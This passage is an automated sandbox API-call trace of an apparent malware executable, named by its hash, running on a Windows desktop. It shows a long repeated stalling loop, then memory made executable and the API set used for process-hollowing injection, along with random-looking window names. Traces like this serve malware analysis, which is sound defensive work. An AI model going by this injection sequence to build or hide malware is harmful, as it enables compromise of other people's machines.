hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.446] GetSystemDefaultLangID () returned 0x2710409 [0094.446] GetThreadLocale () returned 0x409 [0094.446] GetCurrentProcess () returned 0xffffffff [0094.446] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.446] GetSystemDefaultLangID () returned 0x2710409 [0094.446] GetThreadLocale () returned 0x409 [0094.446] GetCurrentProcess () returned 0xffffffff [0094.446] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.446] GetSystemDefaultLangID () returned 0x2710409 [0094.446] GetThreadLocale () returned 0x409 [0094.446] GetCurrentProcess () returned 0xffffffff [0094.446] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.446] GetSystemDefaultLangID () returned 0x2710409 [0094.446] GetThreadLocale () returned 0x409 [0094.446] GetCurrentProcess () returned 0xffffffff [0094.446] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.446] GetSystemDefaultLangID () returned 0x2710409 [0094.446] GetThreadLocale () returned 0x409 [0094.446] GetCurrentProcess () returned 0xffffffff [0094.446] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.446] GetSystemDefaultLangID () returned 0x2710409 [0094.446] GetThreadLocale () returned 0x409 [0094.446] GetCurrentProcess () returned 0xffffffff [0094.446] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.446] GetSystemDefaultLangID () returned 0x2710409 [0094.446] GetThreadLocale () returned 0x409 [0094.447] GetCurrentProcess () returned 0xffffffff [0094.447] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.447] GetSystemDefaultLangID () returned 0x2710409 [0094.447] GetThreadLocale () returned 0x409 [0094.447] GetCurrentProcess () returned 0xffffffff [0094.447] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.447] GetSystemDefaultLangID () returned 0x2710409 [0094.447] GetThreadLocale () returned 0x409 [0094.447] GetCurrentProcess () returned 0xffffffff [0094.447] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.447] GetSystemDefaultLangID () returned 0x2710409 [0094.447] GetThreadLocale () returned 0x409 [0094.447] GetCurrentProcess () returned 0xffffffff [0094.447] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.447] GetSystemDefaultLangID () returned 0x2710409 [0094.447] GetThreadLocale () returned 0x409 [0094.447] GetCurrentProcess () returned 0xffffffff [0094.447] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.447] GetSystemDefaultLangID () returned 0x2710409 [0094.447] GetThreadLocale () returned 0x409 [0094.447] GetCurrentProcess () returned 0xffffffff [0094.447] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.447] GetSystemDefaultLangID () returned 0x2710409 [0094.447] GetThreadLocale () returned 0x409 [0094.447] GetCurrentProcess () returned 0xffffffff [0094.447] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.447] GetSystemDefaultLangID () returned 0x2710409 [0094.447] GetThreadLocale () returned 0x409 [0094.447] GetCurrentProcess () returned 0xffffffff [0094.447] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.447] GetSystemDefaultLangID () returned 0x2710409 [0094.447] GetThreadLocale () returned 0x409 [0094.448] GetCurrentProcess () returned 0xffffffff [0094.448] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.448] GetSystemDefaultLangID () returned 0x2710409 [0094.448] GetThreadLocale () returned 0x409 [0094.448] GetCurrentProcess () returned 0xffffffff [0094.448] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.448] GetSystemDefaultLangID () returned 0x2710409 [0094.448] GetThreadLocale () returned 0x409 [0094.448] GetCurrentProcess () returned 0xffffffff [0094.448] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.448] GetSystemDefaultLangID () returned 0x2710409 [0094.448] GetThreadLocale () returned 0x409 [0094.448] GetCurrentProcess () returned 0xffffffff [0094.448] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.448] GetSystemDefaultLangID () returned 0x2710409 [0094.448] GetThreadLocale () returned 0x409 [0094.448] GetCurrentProcess () returned 0xffffffff [0094.448] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.448] GetSystemDefaultLangID () returned 0x2710409 [0094.448] GetThreadLocale () returned 0x409 [0094.448] GetCurrentProcess () returned 0xffffffff [0094.448] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.448] GetSystemDefaultLangID () returned 0x2710409 [0094.448] GetThreadLocale () returned 0x409 [0094.448] GetCurrentProcess () returned 0xffffffff [0094.448] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.448] GetSystemDefaultLangID () returned 0x2710409 [0094.448] GetThreadLocale () returned 0x409 [0094.448] GetCurrentProcess () returned 0xffffffff [0094.448] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.448] GetSystemDefaultLangID () returned 0x2710409 [0094.448] GetThreadLocale () returned 0x409 [0094.449] GetCurrentProcess () returned 0xffffffff [0094.449] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.449] GetSystemDefaultLangID () returned 0x2710409 [0094.449] GetThreadLocale () returned 0x409 [0094.449] GetCurrentProcess () returned 0xffffffff [0094.449] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.449] GetSystemDefaultLangID () returned 0x2710409 [0094.449] GetThreadLocale () returned 0x409 [0094.449] GetCurrentProcess () returned 0xffffffff [0094.449] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.449] GetSystemDefaultLangID () returned 0x2710409 [0094.449] GetThreadLocale () returned 0x409 [0094.449] GetCurrentProcess () returned 0xffffffff [0094.449] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.449] GetSystemDefaultLangID () returned 0x2710409 [0094.449] GetThreadLocale () returned 0x409 [0094.449] GetCurrentProcess () returned 0xffffffff [0094.449] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.449] GetSystemDefaultLangID () returned 0x2710409 [0094.449] GetThreadLocale () returned 0x409 [0094.449] GetCurrentProcess () returned 0xffffffff [0094.449] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.449] GetSystemDefaultLangID () returned 0x2710409 [0094.449] GetThreadLocale () returned 0x409 [0094.449] GetCurrentProcess () returned 0xffffffff [0094.449] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.449] GetSystemDefaultLangID () returned 0x2710409 [0094.449] GetThreadLocale () returned 0x409 [0094.449] GetCurrentProcess () returned 0xffffffff [0094.449] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.449] GetSystemDefaultLangID () returned 0x2710409 [0094.449] GetThreadLocale () returned 0x409 [0094.449] GetCurrentProcess () returned 0xffffffff [0094.449] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.450] GetSystemDefaultLangID () returned 0x2710409 [0094.450] GetThreadLocale () returned 0x409 [0094.450] GetCurrentProcess () returned 0xffffffff [0094.450] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.450] GetSystemDefaultLangID () returned 0x2710409 [0094.450] GetThreadLocale () returned 0x409 [0094.450] GetCurrentProcess () returned 0xffffffff [0094.450] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.450] GetSystemDefaultLangID () returned 0x2710409 [0094.450] GetThreadLocale () returned 0x409 [0094.450] GetCurrentProcess () returned 0xffffffff [0094.450] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.450] GetSystemDefaultLangID () returned 0x2710409 [0094.450] GetThreadLocale () returned 0x409 [0094.450] GetCurrentProcess () returned 0xffffffff [0094.450] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.450] GetSystemDefaultLangID () returned 0x2710409 [0094.450] GetThreadLocale () returned 0x409 [0094.450] GetCurrentProcess () returned 0xffffffff [0094.450] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.450] GetSystemDefaultLangID () returned 0x2710409 [0094.450] GetThreadLocale () returned 0x409 [0094.450] GetCurrentProcess () returned 0xffffffff [0094.450] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.450] GetSystemDefaultLangID () returned 0x2710409 [0094.450] GetThreadLocale () returned 0x409 [0094.450] GetCurrentProcess () returned 0xffffffff [0094.450] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.450] GetSystemDefaultLangID () returned 0x2710409 [0094.450] GetThreadLocale () returned 0x409 [0094.450] GetCurrentProcess () returned 0xffffffff [0094.451] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.451] GetSystemDefaultLangID () returned 0x2710409 [0094.451] GetThreadLocale () returned 0x409 [0094.451] GetCurrentProcess () returned 0xffffffff [0094.451] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.451] GetSystemDefaultLangID () returned 0x2710409 [0094.451] GetThreadLocale () returned 0x409 [0094.451] GetCurrentProcess () returned 0xffffffff [0094.451] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.451] GetSystemDefaultLangID () returned 0x2710409 [0094.451] GetThreadLocale () returned 0x409 [0094.451] GetCurrentProcess () returned 0xffffffff [0094.451] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.451] GetSystemDefaultLangID () returned 0x2710409 [0094.451] GetThreadLocale () returned 0x409 [0094.451] GetCurrentProcess () returned 0xffffffff [0094.451] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.451] GetSystemDefaultLangID () returned 0x2710409 [0094.451] GetThreadLocale () returned 0x409 [0094.451] GetCurrentProcess () returned 0xffffffff [0094.451] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.451] GetSystemDefaultLangID () returned 0x2710409 [0094.451] GetThreadLocale () returned 0x409 [0094.451] GetCurrentProcess () returned 0xffffffff [0094.451] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.451] GetSystemDefaultLangID () returned 0x2710409 [0094.451] GetThreadLocale () returned 0x409 [0094.451] GetCurrentProcess () returned 0xffffffff [0094.451] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.452] GetSystemDefaultLangID () returned 0x2710409 [0094.452] GetThreadLocale () returned 0x409 [0094.452] GetCurrentProcess () returned 0xffffffff [0094.452] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.452] GetSystemDefaultLangID () returned 0x2710409 [0094.452] GetThreadLocale () returned 0x409 [0094.452] GetCurrentProcess () returned 0xffffffff [0094.452] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.452] GetSystemDefaultLangID () returned 0x2710409 [0094.452] GetThreadLocale () returned 0x409 [0094.452] GetCurrentProcess () returned 0xffffffff [0094.452] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.452] GetSystemDefaultLangID () returned 0x2710409 [0094.452] GetThreadLocale () returned 0x409 [0094.452] GetCurrentProcess () returned 0xffffffff [0094.452] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.452] GetSystemDefaultLangID () returned 0x2710409 [0094.452] GetThreadLocale () returned 0x409 [0094.452] GetCurrentProcess () returned 0xffffffff [0094.452] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.452] GetSystemDefaultLangID () returned 0x2710409 [0094.452] GetThreadLocale () returned 0x409 [0094.452] GetCurrentProcess () returned 0xffffffff [0094.452] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.452] GetSystemDefaultLangID () returned 0x2710409 [0094.452] GetThreadLocale () returned 0x409 [0094.452] GetCurrentProcess () returned 0xffffffff [0094.452] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.452] GetSystemDefaultLangID () returned 0x2710409 [0094.452] GetThreadLocale () returned 0x409 [0094.452] GetCurrentProcess () returned 0xffffffff [0094.452] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.452] GetSystemDefaultLangID () returned 0x2710409 [0094.453] GetThreadLocale () returned 0x409 [0094.453] GetCurrentProcess () returned 0xffffffff [0094.453] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.453] GetSystemDefaultLangID () returned 0x2710409 [0094.453] GetThreadLocale () returned 0x409 [0094.453] GetCurrentProcess () returned 0xffffffff [0094.453] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.453] GetSystemDefaultLangID () returned 0x2710409 [0094.453] GetThreadLocale () returned 0x409 [0094.453] GetCurrentProcess () returned 0xffffffff [0094.453] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.453] GetSystemDefaultLangID () returned 0x2710409 [0094.453] GetThreadLocale () returned 0x409 [0094.453] GetCurrentProcess () returned 0xffffffff [0094.453] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.453] GetSystemDefaultLangID () returned 0x2710409 [0094.453] GetThreadLocale () returned 0x409 [0094.453] GetCurrentProcess () returned 0xffffffff [0094.453] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.453] GetSystemDefaultLangID () returned 0x2710409 [0094.453] GetThreadLocale () returned 0x409 [0094.453] GetCurrentProcess () returned 0xffffffff [0094.453] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.453] GetSystemDefaultLangID () returned 0x2710409 [0094.453] GetThreadLocale () returned 0x409 [0094.453] GetCurrentProcess () returned 0xffffffff [0094.453] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.453] GetSystemDefaultLangID () returned 0x2710409 [0094.453] GetThreadLocale () returned 0x409 [0094.453] GetCurrentProcess () returned 0xffffffff [0094.453] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.453] GetSystemDefaultLangID () returned 0x2710409 [0094.453] GetThreadLocale () returned 0x409 [0094.453] GetCurrentProcess () returned 0xffffffff [0094.454] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.454] GetSystemDefaultLangID () returned 0x2710409 [0094.454] GetThreadLocale () returned 0x409 [0094.454] GetCurrentProcess () returned 0xffffffff [0094.454] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.454] GetSystemDefaultLangID () returned 0x2710409 [0094.454] GetThreadLocale () returned 0x409 [0094.454] GetCurrentProcess () returned 0xffffffff [0094.454] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.454] GetSystemDefaultLangID () returned 0x2710409 [0094.454] GetThreadLocale () returned 0x409 [0094.454] GetCurrentProcess () returned 0xffffffff [0094.454] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.454] GetSystemDefaultLangID () returned 0x2710409 [0094.454] GetThreadLocale () returned 0x409 [0094.454] GetCurrentProcess () returned 0xffffffff [0094.454] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.454] GetSystemDefaultLangID () returned 0x2710409 [0094.454] GetThreadLocale () returned 0x409 [0094.454] GetCurrentProcess () returned 0xffffffff [0094.454] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.454] GetSystemDefaultLangID () returned 0x2710409 [0094.454] GetThreadLocale () returned 0x409 [0094.454] GetCurrentProcess () returned 0xffffffff [0094.454] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.454] GetSystemDefaultLangID () returned 0x2710409 [0094.454] GetThreadLocale () returned 0x409 [0094.454] GetCurrentProcess () returned 0xffffffff [0094.454] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.454] GetSystemDefaultLangID () returned 0x2710409 [0094.454] GetThreadLocale () returned 0x409 [0094.454] GetCurrentProcess () returned 0xffffffff [0094.454] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.455] GetSystemDefaultLangID () returned 0x2710409 [0094.455] GetThreadLocale () returned 0x409 [0094.455] GetCurrentProcess () returned 0xffffffff [0094.455] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.455] GetSystemDefaultLangID () returned 0x2710409 [0094.455] GetThreadLocale () returned 0x409 [0094.455] GetCurrentProcess () returned 0xffffffff [0094.455] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.455] GetSystemDefaultLangID () returned 0x2710409 [0094.455] GetThreadLocale () returned 0x409 [0094.455] GetCurrentProcess () returned 0xffffffff [0094.455] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.455] GetSystemDefaultLangID () returned 0x2710409 [0094.455] GetThreadLocale () returned 0x409 [0094.455] GetCurrentProcess () returned 0xffffffff [0094.455] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.455] GetSystemDefaultLangID () returned 0x2710409 [0094.455] GetThreadLocale () returned 0x409 [0094.455] GetCurrentProcess () returned 0xffffffff [0094.455] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.455] GetSystemDefaultLangID () returned 0x2710409 [0094.455] GetThreadLocale () returned 0x409 [0094.455] GetCurrentProcess () returned 0xffffffff [0094.455] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.455] GetSystemDefaultLangID () returned 0x2710409 [0094.455] GetThreadLocale () returned 0x409 [0094.455] GetCurrentProcess () returned 0xffffffff [0094.455] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.464] GetSystemDefaultLangID () returned 0x2710409 [0094.464] GetThreadLocale () returned 0x409 [0094.464] GetCurrentProcess () returned 0xffffffff [0094.464] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.464] GetSystemDefaultLangID () returned 0x2710409 [0094.464] GetThreadLocale () returned 0x409 [0094.464] GetCurrentProcess () returned 0xffffffff [0094.464] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.464] GetSystemDefaultLangID () returned 0x2710409 [0094.464] GetThreadLocale () returned 0x409 [0094.464] GetCurrentProcess () returned 0xffffffff [0094.464] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.464] GetSystemDefaultLangID () returned 0x2710409 [0094.464] GetThreadLocale () returned 0x409 [0094.464] GetCurrentProcess () returned 0xffffffff [0094.464] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.464] GetSystemDefaultLangID () returned 0x2710409 [0094.464] GetThreadLocale () returned 0x409 [0094.464] GetCurrentProcess () returned 0xffffffff [0094.464] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.464] GetSystemDefaultLangID () returned 0x2710409 [0094.464] GetThreadLocale () returned 0x409 [0095.185] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x752b0000 [0095.185] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualProtect") returned 0x752c4317 [0095.185] VirtualProtect (in: lpAddress=0x280020, dwSize=0x91090, flNewProtect=0x40, lpflOldProtect=0x18e818 | out: lpflOldProtect=0x18e818*=0x4) returned 1 [0095.286] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x752b0000 [0095.286] GetProcAddress (hModule=0x752b0000, lpProcName="GlobalAlloc") returned 0x752c5846 [0095.286] GetProcAddress (hModule=0x752b0000, lpProcName="GetLastError") returned 0x752c11c0 [0095.286] GetProcAddress (hModule=0x752b0000, lpProcName="Sleep") returned 0x752c10ff [0095.286] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAlloc") returned 0x752c1836 [0095.286] GetProcAddress (hModule=0x752b0000, lpProcName="CreateToolhelp32Snapshot") returned 0x752e7327 [0095.287] GetProcAddress (hModule=0x752b0000, lpProcName="Module32First") returned 0x75346279 [0095.287] GetProcAddress (hModule=0x752b0000, lpProcName="CloseHandle") returned 0x752c13f0 [0095.287] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x5c [0095.289] Module32First (hSnapshot=0x5c, lpme=0x18e5a4) returned 1 [0095.291] VirtualAlloc (lpAddress=0x0, dwSize=0x11a5a0, flAllocationType=0x1000, flProtect=0x40) returned 0x3d90000 [0095.327] LoadLibraryA (lpLibFileName="user32") returned 0x76860000 [0095.328] GetProcAddress (hModule=0x76860000, lpProcName="MessageBoxA") returned 0x768cfd1e [0095.328] GetProcAddress (hModule=0x76860000, lpProcName="GetMessageExtraInfo") returned 0x7689ed76 [0095.328] LoadLibraryA (lpLibFileName="kernel32") returned 0x752b0000 [0095.328] GetProcAddress (hModule=0x752b0000, lpProcName="WinExec") returned 0x75343051 [0095.328] GetProcAddress (hModule=0x752b0000, lpProcName="CreateFileA") returned 0x752c537e [0095.328] GetProcAddress (hModule=0x752b0000, lpProcName="WriteFile") returned 0x752c1282 [0095.328] GetProcAddress (hModule=0x752b0000, lpProcName="CloseHandle") returned 0x752c13f0 [0095.328] GetProcAddress (hModule=0x752b0000, lpProcName="CreateProcessA") returned 0x752c1072 [0095.328] GetProcAddress (hModule=0x752b0000, lpProcName="GetThreadContext") returned 0x752e799c [0095.328] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAlloc") returned 0x752c1836 [0095.328] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAllocEx") returned 0x752dd980 [0095.329] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualFree") returned 0x752c184e [0095.329] GetProcAddress (hModule=0x752b0000, lpProcName="ReadProcessMemory") returned 0x752dcfa4 [0095.329] GetProcAddress (hModule=0x752b0000, lpProcName="WriteProcessMemory") returned 0x752dd9b0 [0095.329] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadContext") returned 0x75345933 [0095.329] GetProcAddress (hModule=0x752b0000, lpProcName="ResumeThread") returned 0x752c43a7 [0095.329] GetProcAddress (hModule=0x752b0000, lpProcName="WaitForSingleObject") returned 0x752c1136 [0095.329] GetProcAddress (hModule=0x752b0000, lpProcName="GetModuleFileNameA") returned 0x752c1491 [0095.329] GetProcAddress (hModule=0x752b0000, lpProcName="GetCommandLineA") returned 0x752c5159 [0095.329] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f00000 [0095.335] GetProcAddress (hModule=0x76f00000, lpProcName="NtUnmapViewOfSection") returned 0x76f1fc70 [0095.335] GetProcAddress (hModule=0x76f00000, lpProcName="NtWriteVirtualMemory") returned 0x76f1fe04 [0095.335] GetProcAddress (hModule=0x76860000, lpProcName="RegisterClassExA") returned 0x7687db98 [0095.335] GetProcAddress (hModule=0x76860000, lpProcName="CreateWindowExA") returned 0x7687d22e [0095.335] GetProcAddress (hModule=0x76860000, lpProcName="PostMessageA") returned 0x76883baa [0095.335] GetProcAddress (hModule=0x76860000, lpProcName="GetMessageA") returned 0x76877bd3 [0095.336] GetProcAddress (hModule=0x76860000, lpProcName="DefWindowProcA") returned 0x76f424e0 [0095.336] GetProcAddress (hModule=0x752b0000, lpProcName="GetFileAttributesA") returned 0x752c53cc [0095.336] GetProcAddress (hModule=0x752b0000, lpProcName="GetStartupInfoA") returned 0x752c0e00 [0095.336] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualProtectEx") returned 0x75344b5f [0095.336] GetProcAddress (hModule=0x752b0000, lpProcName="ExitProcess") returned 0x752c79c8 [0095.336] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0095.337] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0095.337] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0095.337] RegisterClassExA (param_1=0x18e260) returned 0x25c1d0 [0095.338] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x80182 [0095.361] PostMessageA (hWnd=0x80182, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0095.361] GetMessageA (in: lpMsg=0x18e290, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e290) returned 1 [0095.362] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0095.362] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x210000, nSize=0x2800 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe")) returned 0x5f [0095.362] GetStartupInfoA (in: lpStartupInfo=0x18e1b4 | out: lpStartupInfo=0x18e1b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0095.362] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --Admin IsNotAutoStart IsNotTask" [0095.362] 